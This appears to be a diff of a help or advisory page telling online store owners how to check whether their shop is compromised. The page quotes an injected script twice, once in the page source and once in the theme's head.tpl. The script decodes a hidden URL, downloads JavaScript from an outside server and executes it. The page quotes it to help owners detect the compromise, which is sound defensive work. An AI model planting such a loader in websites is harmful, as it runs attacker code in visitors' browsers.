 How do I check if my store is affected?

-In the front office
+In the Front Office

 You can check your front office code by inspecting a page on your site (right-click, then "inspect").
+Look inside the <script> tag; if you find the following code, it means your store is impacted:

 <script>(function(){var x=new XMLHttpRequest;x.open('GET',atob('aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz'));x.onload=function(){if(200===x.status)try{Function(x.responseText)()}catch(e){}};x.send();})();</script>

-Connect to your server via FTP then navigate through the theme folder, then the active theme folder > template folder > _partial folder > head.tpl.
-On this file, right-click then "view/edit", and look for the same tag:
+- You can find the same script tag in a file on your server.
+Connect to your server via FTP then navigate through the theme folder, then the active theme folder > template folder > _partial >

 <script>(function(){var x=new XMLHttpRequest;x.open('GET',atob('aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz'));x.onload=function(){if(200===x.status)try{Function(x.responseText)()}catch(e){}};x.send();})();</script>